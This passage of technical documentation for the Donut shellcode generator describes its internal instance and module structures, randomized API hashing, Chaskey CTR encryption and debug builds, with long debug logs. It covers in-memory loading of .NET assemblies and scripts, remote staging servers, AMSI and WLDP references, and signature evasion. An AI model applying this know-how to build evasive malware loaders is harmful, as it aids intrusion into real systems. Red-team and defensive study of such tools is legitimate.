124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var>, which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check whether an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>. This is a sanity check that the correct key was used, not an authentication tag: it covers only <code>sig</code>, not the module <code>data</code>, and since the module is encrypted in CTR mode, a ciphertext whose data bytes were tampered with on the staging server would still pass this check.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of 64-bit API hashes required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API functions at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5, except only 32 bits of the string length are stored in the buffer instead of 64. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance, so the hash values themselves cannot be used as a static signature for Donut; the hashing code and the IV are still present in the payload, however, so other detection methods remain possible. Future releases will likely support alternative methods of resolving API addresses to decrease the chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with a 128-bit key, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key, which is stored in the donut payload. Two caveats apply: CTR mode provides confidentiality only, not integrity, so the ciphertext can be modified without detection; and because the key lives inside the payload, the encryption is no defence against anyone who already holds the shellcode. The master key and counter are generated randomly by <code>DonutCreate</code> for every module and instance; a key/counter pair must never be reused, as CTR mode with a repeated keystream leaks the XOR of the two plaintexts.</p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step of executing a file in-memory, which can be useful in tracking down bugs. To build a debug-enabled executable, specify the <code>debug</code> target with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
